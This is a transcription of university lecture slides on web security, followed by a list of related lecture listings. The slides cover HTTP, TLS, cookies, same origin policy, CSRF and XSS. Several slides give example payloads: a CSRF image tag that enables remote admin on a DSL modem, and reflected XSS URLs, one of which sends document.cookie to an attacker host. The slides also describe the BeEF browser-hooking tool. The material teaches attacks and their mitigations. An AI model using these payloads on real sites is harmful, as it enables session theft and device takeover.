CIT 480: Securing Computer Systems
|
|
- Blanche Ramsey
- 5 years ago
- Views:
Transcription
1 CIT 480: Securing Computer Systems Web Security I
2 Topics 1. HTTP 2. Transport Layer Security (TLS) 3. URLs 4. HTML and the DOM 5. Same Origin Policy 6. Cross-Site Attacks
3 Web Transactions Web Server Web Browser OS Network
4 HTTP: HyperText Transfer Protocol Simple request/respond protocol Request methods: GET, POST, HEAD, etc. Protocol versions: 1.0, 1.1 Stateless Each request independent of previous requests, i.e. request #2 doesn t know you authenticated in #1. Applications responsible for handling state. Multiple state options: cookies, URLs, secret form parameters, supercookies.
5 HTTP Request Method URL Protocol Version GET HTTP/1.1 Headers Host: User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/ Firefox/ Accept: text/html, image/png, */* Accept-Language: en-us,en;q=0.5 Cookie: rememberme=true; PREF=ID=21039ab4bbc49153:FF=4 Blank Line No Data for GET method
6 HTTP Response Protocol Version HTTP Response Code Blank Line HTTP/ OK Headers Cache-Control: private Content-Type: text/html Server: GWS/2.1 Date: Fri, 13 Oct :16:30 GMT <HTML>... (page data)... </HTML> Web Page Data
7 HTTP Methods Method GET HEAD PUT DELETE OPTIONS POST Description Retrieve resource located at specified URI. Retrieve metadata about resource located at specified URI. Useful for caches to determine if they need to retrieve an updated resource. Create or replace resource located at specified URI with resource provided by client. Delete resource located at specified URI. Return list of HTTP methods that can be used with specified URI. Create a new resource under the specified URI, e.g. adding a new message in a web forum, adding a comment to a blog post, annotating a photo, etc. In summary, POST is a way for a client to create a new resource without knowing its URI; the client just knows the URI of a parent or factory resource.
8 Different Security Perspectives Client Side Server Side HTTP requests may reveal private info. HTTP responses may reveal private info. HTTP responses may include malicious code (Java, ActiveX, JavaScript) HTTP requests may contain malicious input. HTTP requests may have forged authentication. HTTP responses may be intercepted.
9 Transport Layer Security (TLS) TLS protocol provides security features for other protocols, such as HTTP, IMAP, etc. 1. Authentication of server to client. 2. Optional authentication of client to server. 3. Confidentiality of communication. 4. Integrity of communication. TLS 1.0 was published in SSL 2.0 was first released in 1995 (insecure) TLS 1.2 is most recent, defined in 2008.
10 Transport Layer Security (TLS) TLS protocol provides security features for other protocols, such as HTTP, IMAP, etc. 1. Authentication of server to client. 2. Optional authentication of client to server. 3. Confidentiality of communication. 4. Integrity of communication. TLS 1.0 was published in SSL 2.0 was first released in 1995 (insecure) TLS 1.2 is most recent, defined in 2008.
11 TLS Operation
12 TLS Handshake
13 Cipher Suites 1. Key Exchange Algorithm Used to exchange session keys for bulk encryption algorithm. Examples: RSA, Diffie-Hellmann 2. Bulk Encryption Algorithm Used to encrypt message stream. Examples: RC4-128, Triple-DES, AES-128, AES Message Authentication Code MAC is keyed hash function to ensure integrity. Based on MD5, SHA-1, or SHA-2, key based on master secret. 4. Pseudorandom Function Used to create master secret, a 48-byte secret shared with both parties. Used to create session keys.
14 X.509 Digital Certificates Certificate contains Identity of issuer, who produced certificate. Identity of subject. Public key of subject. Range of dates for which certificate is valid. Digital signature from issuer. Signature means that issuer vouches that Public key belongs to subject, e.g. You really are connected to example.com. Client has list of trusted certificate authorities (CAs) Client will trust certificate if it is signed by one of those CAs or if issuer has a certificate that was signed by CA.
15 Certificate Authorities CA is an entity that issues digital certificates. Trusted 3 rd party that enables public key crypto. Hundreds of CAs exist in dozens of countries. CAs can revoke certificates too If certificate improperly issued or private key leaked. Certificate Revocation Lists (CRLs). Clients should check CRLs before using certificate. Example certificate authorities Symantec (Verisign, Thawte, Geotrust) Go Daddy
16 Certificate Validation How does CA know subject is who they claim to be? Competition between CAs drove prices low, So validation checks became perfunctory. Example: Diginotar CA issued certificate for gmail to someone from Iran in Extended Validation (EV) Certificates Known procedure verifies legal entity who controls site. Guidelines: CAs must pass a qualified audit to issue EV certificates. Cost is significantly higher. Browser UI indicates EV with location bar color.
17 HTTPS (HTTP over SSL) HTTPS differences Default port is 443. Connection: close HTTP header ends session. RFC 2818: HTTP over TLS Encrypts URL of requested document HTTP headers HTTP bodies, including response documents All form parameters, as they are either in the URL or the HTTP body.
18 TLS Attacks Version and renegotiation attacks Trick browser into using insecure SSL or cipher version. Man-in-the-middle attacks Sslsniff, but will produce certificate warnings. Sslstrip converts https links to http links, so user communicates in plaintext with middleman. Certificate attacks Trick CA into issuing certificate to wrong person. Use crypto weaknesses to create certs for any site. Implementation attacks Heartbleed(2014): OpenSSL memory reading attack.
19 URL Format Whitespace (space, tab, ff, etc.) marks end of separates login credentials from hostname. : separates hostname from optional port number.? marks beginning of query string. & separates query parameters. # separates fragment identifier. %HH represents character with hex values. : /? # [ delimiters must be URL encoded.
20 URL Encoding Query string is set of key-value pairs separated by &?q=cloud&lang=en Whitespace marks end of URL Special characters must be URL-encoded. %HH represents character as hex value, e.g. %20 = space. Special characters include whitespace / # & Any character may be encoded, including proto, path, &c. URL encoding is also used in the body of POST requests.
21 URL Examples
22 HTTP is a stateless protocol A stateful protocol allows requests to move the server into a different state, in which a request may produce a different result. Example protocols: FTP, SMTP, TCP FTP command get rest.txt will return a different file when cwd is /public rather than /private. A stateless protocol treats each request as an independent transaction that is unrelated to any previous request so that communication consists of independent pairs of requests and responses. Examples: HTTP, IP
23 Handling Statelessness Store state information directly in the address (URI) To access second page in google search for http : q=http&safe=off&start=10 Works best for web services. Store state indirectly in an HTTP header (cookies) Set-Cookie header from server creates cookie. Client must return Cookie HTTP header with each subsequent request if it wants the server to remember its state. Cookie is a pointer to state stored on the server. Example: most shopping cart applications.
24 HTML <html> <head> <title>this is a title</title> </head> <body> <p class= only >Hello world!</p> <img src= images/hello.png /> </body> </html>
25 HTML Special Characters < begins a tag > ends a tag some browsers will auto-insert matching < and enclosed attributes optional unless spaces or other meaningful chars. & begins an HTML entity entities used to represent special characters.
26 HTML Entities Entities can encode any Unicode character. Reference UCS code point via the notation: &#nnnn; (decimal) or &#xhhhh; (hexadecimal) Some common entities have names. Special characters must be encoded as entities: & & < < > > " " ' '
27 Character Set Encoding Default: ISO (Latin-1) Char sets dictate which chars are special UTF-8 allows multiple representations Force Latin-1 encoding of web page with: <META http-equiv= Content-Type content= text/html; charset=iso >
28 HTML Forms <form> tag action=url destination for form input. method=get sends input as query string parameters method=post sends input as data in POST method <input> tag name=name of input. type attribute specifies checkbox, radio, text, etc.
29 HTTP POST Request Method URL Protocol Version POST HTTP/1.1 Headers Host: User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/ Firefox/ Accept: text/html, image/png, */* Accept-Language: en-us,en;q=0.5 Blank Line name=jane+doe&sex=female&color=green&ove r6feet=true&over200pounds=false&athletic ability=na POST data
30 Hidden Fields <input type= hidden name= user value= james > Used to propagate data between HTTP requests since protocol is stateless. Clearly visible in HTML source. User can modify hidden values since form can be copied, modified to change hidden fields, then used to invoke script.
31 Document Object Model (DOM) DOM connects JavaScript and CSS to HTML documents. JavaScript can read and modify every element of HTML. Dynamic HTML (DHTML) = DOM + JavaScript + CSS. Capability used by threats in cross-site scripting attacks.
32 DHTML vs. Ajax
33 Cookies Server to Client Content-type: text/html Set-Cookie: foo=bar; path=/; expires Fri, 20-Feb :59:00 GMT Client to Server Content-type: text/html Cookie: foo=bar
34 Cookie Fields Expires: if specified, cookie may be saved to disk and persist across sessions. If not, then cookie persists for duration of session. Domain: allows cookie to be sent to servers other than the hostname that sent the Set-Cookie header. Path: ensures that cookie is only returned when URL path component is under path. Secure: prevents cookie from being sent over non-encrypted connections. HttpOnly: removes ability to read cookie via document.cookie API in JavaScript to protect against XSS.
35 Cookie Security Policy Domain parameter limits which servers are sent cookie in complex ways (see table). Path parameter limits which paths are sent cookies, but JavaScript from any path can read cookies.
36 Same Origin Policy (SOP) Goal: prevent web pages of different origins from accessing each others data, such as cookies, hidden fields, web local storage, etc. Origin = scheme, hostname, and port. Example: evil.com should not be able to access cookies from example.com.
37 Is SOP appropriate? Sometimes SOP is too permissive: If hosting user web pages via ~name URLs, and share the same origin and thus no protection. Sometimes SOP is too restrictive: Web servers in subdomains for different purposes. and have different origins and cannot share cookies.
38 Cross-Site Attacks Target users of application. Use application feature to reach other users of application, bypassing same origin policy. Obtain assets of individual users rather than assets of entire application. One of the most common types of attack. Cross-Site Request Forgery (CSRF) Cross-Site Scripting (XSS)
39 Cross-Site Request Forgery A confused deputy attack. Exploits trust that application has with authentication sessions. Attack scenario: User authenticates to web application. User browses to another site containing a malicious CSRF attack link to web app. iframe, img, link, bgsound, etc. Browser accesses web app with cached credentials, performing whatever action specified by the link.
40 Example: DSL Modem Attack Home network devices are administered via web apps. Standard local IPs. Attacker inserts 1-pixel img tag on page. src is URL of form submission, giving remote admin. No password needed. Software owner assumed device on trusted local network. Of course, browser is on the local network too. <img src=" sword=blehblah&nss_enablewanadminaccessres=on&time outdisable=0&enable=enable" alt="" width="1" height="1" />
41 Mitigating CSRF Require POST for data modifications, but Many frameworks automatically fetch both types of parameters or convert one to other. Hidden POST requests can be created with scripts. Check referer header. But users can block or forge referer header, so it cannot be relied on for everyone. Use nonces. Random token inserted as hidden parameter, and thus submitted with form. But XSS can read form, so a combined XSS + CSRF attack can bypass this defense.
42 Mitigating CSRF Re-authenticate for high value transactions. Use out of band authentication if possible. Expire session IDs quickly. But there will always be some time period in which a CSRF attack will work. Automate defenses with tools. CSRFGuard to insert nonces. CSRFTester to verify application.
43 Cross-Site Scripting (XSS) Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker s choosing. Impact of XSS Account hijacking. Browser hijacking (malware hosting.) Information leakage (stored form values, etc.) Virtual defacement.
44 XSS Example Web application sends browser to an error page after user clicks submit. rry%2c+an +error+occurred
45 XSS Example The error message is reflected back from the Web server to the client in a web page.
46 XSS Example We can replace the error with JavaScript pt>alert( xss );</script>
47 Exploiting the Example 1. User logins in and is issued a cookie 2. Attacker feed the URL to user pt>var+i=new+image;+i.src= er.com/ %2bdocument.cookie;</script>
48 Why does XSS Work? Same-Origin Policy Browser only allows Javascript from site X to access cookies and other data from site X. Attacker needs to make attack come from site X. Vulnerable Server Program Any program that returns user input without filtering out dangerous code.
49 Attack Scenario User clicks on link. Reflected XSS Injected script returned by one-time message from vulnerable site. User browser executes injected code. Limitations Non-persistent. Only works when user clicks. Most common type of XSS (~75%).
50 Anatomy of an XSS Attack Web Server Attacker User 3. XSS Attack 7. Browser runs injected code. 4. User clicks on XSS link. Evil site saves ID.
51 XSS URL Examples t= arget="><script>alert(document.cookie)</script> _page2.html?tw=<script>alert( Test );</script> rt(document.cookie)</script>&frompage=4&page=1& ct=vvtv&mh=0&sh=0&rn=1 arch_exe?search_text=_%22%3e%3cscript%3ealert%2 8document.cookie%29%3C%2Fscript%3E
52 Stored XSS Injected script stored in Post or comment. Review. Uploaded file. User views page with injected script. Malicious action is taken while user is logged into site where malware found. Not technically cross-site. Attack persists until injected code deleted.
53 Browser Exploitation Framework BeEF hooks browsers via XSS exploit Can use as stored or reflected XSS. Hooked browsers are bots controlled by BeEF. Exploitation modules run on hooked browsers to View browsing history. Identify authenticated sessions. Phishing and other social engineering attacks. Port scans of network browser is running on. Reverse proxy into network browser is running on. Use Metasploit.
54 BeEF Screenshot
55 Mitigating XSS 1. Disallow HTML input 2. Allow only safe HTML tags 3. Encode output Replace HTML special characters in output ex: replace < with < and > with > also replace (, ), #, & 4. Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for.
56 Key Points 1. Key features of the web Understand features and risks of HTTP, HTML, DOM Both client and server must validate input. 2. HTTPS = HTTP + TLS Authentication of server via certificate. Confidentiality + integrity of data in transit. Input-based attacks like XSS can be delivered via SSL. 3. Same Origin Policy (SOP) Prevents web sites from accessing data from other sites. Protects cookies, headers, form parameters, etc. 4. Cross-site Attacks Bypass SOP by tricking vulnerable web application to get browser to run malicious code sent by attacker.
57 References 1. Andreu, Professional Penetration Testing for Web Applications, Wrox, Goodrich and Tammasia, Introduction to Computer Security, Pearson, Joel Scambray, Mike Shema, Caleb Sima, Hacking Exposed Web Applications, Second Edition, McGraw-Hill, Sarkar and Fitzgerald, Attacks on SSL: A comprehensive study of BEAST, CRIME, TIME, BREACH, LUCKY 13, and RC4 biases, Stallings, Cryptography and Network Security: Principles and Practice, 6 th ed, Prentice Hall, Stuttart and Pinto, The Web Application Hacker s Handbook, 2 nd ed, Wiley, Michal Zalewski, The Tangled Web: A Guide to Securing Modern Web Applications, No Starch Press, 2012.
CSC 482/582: Computer Security. Cross-Site Security
Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential
More informationTopics. Why Web Application Security? Web Security
Web Security CSC 482/582: Computer Security Slide #1 Topics 1. Why web application security? 2. HTTP and web input types 3. Web Application Vulnerabilities 4. Client-side Attacks 5. Finding Web Vulnerabilities
More informationHTTP Security. CSC 482/582: Computer Security Slide #1
HTTP Security CSC 482/582: Computer Security Slide #1 Topics 1. How HTTP works 2. HTTP methods, headers, and responses 3. URIs, URLs, and URNs 4. Statelessness 5. Cookies 6. More HTTP methods and headers
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationWEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
More informationComputer Security 3e. Dieter Gollmann. Chapter 18: 1
Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationCNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies
CNIT 129S: Securing Web Applications Ch 3: Web Application Technologies HTTP Hypertext Transfer Protocol (HTTP) Connectionless protocol Client sends an HTTP request to a Web server Gets an HTTP response
More informationCommon Websites Security Issues. Ziv Perry
Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationWhy bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?
Jeroen van Beek 1 Why bother? Causes of data breaches OWASP Top ten attacks Now what? Do it yourself Questions? 2 In many cases the web application stores: Credit card details Personal information Passwords
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationlast time: command injection
Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string
More informationOWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP
OWASP Top 10 Risks Dean.Bushmiller@ExpandingSecurity.com Many thanks to Dave Wichers & OWASP My Mom I got on the email and did a google on my boy My boy works in this Internet thing He makes cyber cafes
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationOWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example
Proxy Caches and Web Application Security Using the Recent Google Docs 0-Day as an Example Tim Bass, CISSP Chapter Leader, Thailand +66832975101, tim@unix.com AppSec Asia October 21, 2008 Thailand Worldwide
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationLecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
More informationContent Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
More informationOverview of SSL/TLS. Luke Anderson. 12 th May University Of Sydney.
Overview of SSL/TLS Luke Anderson luke@lukeanderson.com.au 12 th May 2017 University Of Sydney Overview 1. Introduction 1.1 Raw HTTP 1.2 Introducing SSL/TLS 2. Certificates 3. Attacks Introduction Raw
More informationSecure Internet Communication
Secure Internet Communication Can we prevent the Cryptocalypse? Dr. Gregor Koenig Barracuda Networks AG 09.04.2014 Overview Transport Layer Security History Orientation Basic Functionality Key Exchange
More informationDefeating All Man-in-the-Middle Attacks
Defeating All Man-in-the-Middle Attacks PrecisionAccess Vidder, Inc. Defeating All Man-in-the-Middle Attacks 1 Executive Summary The man-in-the-middle attack is a widely used and highly preferred type
More informationInformation Security CS 526
Information Security CS 526 Topic 14: Key Distribution & Agreement, Secure Communication Topic 14: Secure Communication 1 Readings for This Lecture On Wikipedia Needham-Schroeder protocol (only the symmetric
More informationCPET 499/ITC 250 Web Systems Chapter 16 Security. Topics
CPET 499/ITC 250 Web Systems Chapter 16 Security Text Book: * Fundamentals of Web Development, 2015, by Randy Connolly and Ricardo Hoar, published by Pearson Paul I-Hai, Professor http://www.etcs.ipfw.edu/~lin
More informationDistributed Systems. 25. Authentication Paul Krzyzanowski. Rutgers University. Fall 2018
Distributed Systems 25. Authentication Paul Krzyzanowski Rutgers University Fall 2018 2018 Paul Krzyzanowski 1 Authentication For a user (or process): Establish & verify identity Then decide whether to
More informationUniform Resource Locators (URL)
The World Wide Web Web Web site consists of simply of pages of text and images A web pages are render by a web browser Retrieving a webpage online: Client open a web browser on the local machine The web
More informationCSE484 Final Study Guide
CSE484 Final Study Guide Winter 2013 NOTE: This study guide presents a list of ideas and topics that the TAs find useful to know, and may not represent all the topics that could appear on the final exam.
More informationWHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
More informationLecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
More informationLecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
More informationCIS 4360 Secure Computer Systems XSS
CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection
More informationSecurity and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web
Security and Privacy SWE 432, Fall 2016 Design and Implementation of Software for the Web Today Security What is it? Most important types of attacks Privacy For further reading: https://www.owasp.org/index.php/
More informationEvaluating the Security Risks of Static vs. Dynamic Websites
Evaluating the Security Risks of Static vs. Dynamic Websites Ballard Blair Comp 116: Introduction to Computer Security Professor Ming Chow December 13, 2017 Abstract This research paper aims to outline
More informationThe PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference
The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Copyright 2007 - The OWASP Foundation Permission is granted to copy,
More informationCryptography SSL/TLS. Network Security Workshop. 3-5 October 2017 Port Moresby, Papua New Guinea
Cryptography SSL/TLS Network Security Workshop 3-5 October 2017 Port Moresby, Papua New Guinea 1 History Secure Sockets Layer was developed by Netscape in 1994 as a protocol which permitted persistent
More informationICS 351: Today's plan. web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder
ICS 351: Today's plan web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder 1 web scripting languages web content described by HTML was originally static, corresponding to files
More informationCS November 2018
Authentication Distributed Systems 25. Authentication For a user (or process): Establish & verify identity Then decide whether to allow access to resources (= authorization) Paul Krzyzanowski Rutgers University
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationExcerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt
Excerpts of Web Application Security focusing on Data Validation adapted for F.I.S.T. 2004, Frankfurt by fs Purpose of this course: 1. Relate to WA s and get a basic understanding of them 2. Understand
More informationWeb Browser Security. CSC 482/582: Computer Security Slide #1
Web Browser Security CSC 482/582: Computer Security Slide #1 Topics 1. HTML 2. JavaScript, JSON, and the DOM 3. Same Origin Policy (SOP) 4. XHR and Ajax 5. Cross-Origin Resource Sharing (CORS) 6. Extensions
More informationIntroduction to Ethical Hacking
Introduction to Ethical Hacking Summer University 2017 Seoul, Republic of Korea Alexandre Karlov Today Some tools for web attacks Wireshark How a writeup looks like 0x04 Tools for Web attacks Overview
More informationTransport Level Security
2 Transport Level Security : Security and Cryptography Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 28 October 2013 css322y13s2l12, Steve/Courses/2013/s2/css322/lectures/transport.tex,
More information1 About Web Security. What is application security? So what can happen? see [?]
1 About Web Security What is application security? see [?] So what can happen? 1 taken from [?] first half of 2013 Let s focus on application security risks Risk = vulnerability + impact New App: http://www-03.ibm.com/security/xforce/xfisi
More informationICS 351: Today's plan. IPv6 routing protocols (summary) HTML HTTP web scripting languages certificates (review) cookies
ICS 351: Today's plan IPv6 routing protocols (summary) HTML HTTP web scripting languages certificates (review) cookies IPv6 routing almost the same routing protocols as for IPv4: RIPng, OSPFv6, BGP with
More informationSolutions Business Manager Web Application Security Assessment
White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security
More informationOverview. SSL Cryptography Overview CHAPTER 1
CHAPTER 1 Secure Sockets Layer (SSL) is an application-level protocol that provides encryption technology for the Internet. SSL ensures the secure transmission of data between a client and a server through
More informationCSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
More informationCS 142 Winter Session Management. Dan Boneh
CS 142 Winter 2009 Session Management Dan Boneh Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be long (Gmail - two weeks) or short without session mgmt:
More informationEthical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities
Ethical Hacking and Countermeasures: Web Chapter 3 Web Application Vulnerabilities Objectives After completing this chapter, you should be able to: Understand the architecture of Web applications Understand
More informationSoftware and Web Security 2
Software and Web Security 2 Session Management age e sws2 1 Recall from last week Server and client, ie. web application and browser, communicate by HTTP requests and responses HTTP response can be with
More informationPenetration Testing. James Walden Northern Kentucky University
Penetration Testing James Walden Northern Kentucky University Topics 1. What is Penetration Testing? 2. Rules of Engagement 3. Penetration Testing Process 4. Map the Application 5. Analyze the Application
More informationTabular Presentation of the Application Software Extended Package for Web Browsers
Tabular Presentation of the Application Software Extended Package for Web Browsers Version: 2.0 2015-06-16 National Information Assurance Partnership Revision History Version Date Comment v 2.0 2015-06-16
More informationICS 351: Today's plan. web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder
ICS 351: Today's plan web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder 1 client-side scripts and security while client-side scripts do much to improve the appearance of pages,
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationAuthentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1
Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1 CIA Triad Confidentiality Prevent disclosure of information to unauthorized parties Integrity Detect data tampering Availability
More informationINTERNET ENGINEERING. HTTP Protocol. Sadegh Aliakbary
INTERNET ENGINEERING HTTP Protocol Sadegh Aliakbary Agenda HTTP Protocol HTTP Methods HTTP Request and Response State in HTTP Internet Engineering 2 HTTP HTTP Hyper-Text Transfer Protocol (HTTP) The fundamental
More informationPROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
More informationSecuring Internet Communication: TLS
Securing Internet Communication: TLS CS 161: Computer Security Prof. David Wagner March 11, 2016 Today s Lecture Applying crypto technology in practice Two simple abstractions cover 80% of the use cases
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationCertified Secure Web Application Engineer
Certified Secure Web Application Engineer ACCREDITATIONS EXAM INFORMATION The Certified Secure Web Application Engineer exam is taken online through Mile2 s Assessment and Certification System ( MACS ),
More informationPenetration Test Report
Penetration Test Report Feb 12, 2018 Ethnio, Inc. 6121 W SUNSET BLVD LOS angeles, CA 90028 Tel (888) 879-7439 ETHN.io Summary This document contains the most recent pen test results from our third party
More informationExploiting and Defending: Common Web Application Vulnerabilities
Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,
More informationProvide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationSEEM4540 Open Systems for E-Commerce Lecture 03 Internet Security
SEEM4540 Open Systems for E-Commerce Lecture 03 Internet Security Consider 2. Based on DNS, identified the IP address of www.cuhk.edu.hk is 137.189.11.73. 1. Go to http://www.cuhk.edu.hk 3. Forward the
More informationScan Report Executive Summary
Scan Report Executive Summary Part 1. Scan Information Scan Customer Company: Date scan was completed: Vin65 ASV Company: Comodo CA Limited 08/28/2017 Scan expiration date: 11/26/2017 Part 2. Component
More informationCryptography (Overview)
Cryptography (Overview) Some history Caesar cipher, rot13 substitution ciphers, etc. Enigma (Turing) Modern secret key cryptography DES, AES Public key cryptography RSA, digital signatures Cryptography
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationCSWAE Certified Secure Web Application Engineer
CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized
More informationWelcome to the OWASP TOP 10
Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA
More informationCIT 380: Securing Computer Systems. Web Security II
CIT 380: Securing Computer Systems Web Security II Some slides from OWASP Top 10 2013 presentation under Creative Commons Attribute-ShareAlike 3.0 license (https://creativecommons.org/licenses/by-sa/3.0/)
More informationLecture Nov. 21 st 2006 Dan Wendlandt ISP D ISP B ISP C ISP A. Bob. Alice. Denial-of-Service. Password Cracking. Traffic.
15-441 Lecture Nov. 21 st 2006 Dan Wendlandt Worms & Viruses Phishing End-host impersonation Denial-of-Service Route Hijacks Traffic modification Spyware Trojan Horse Password Cracking IP Spoofing DNS
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2017 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2465 1 Assignment
More informationWHITE PAPER. Authentication and Encryption Design
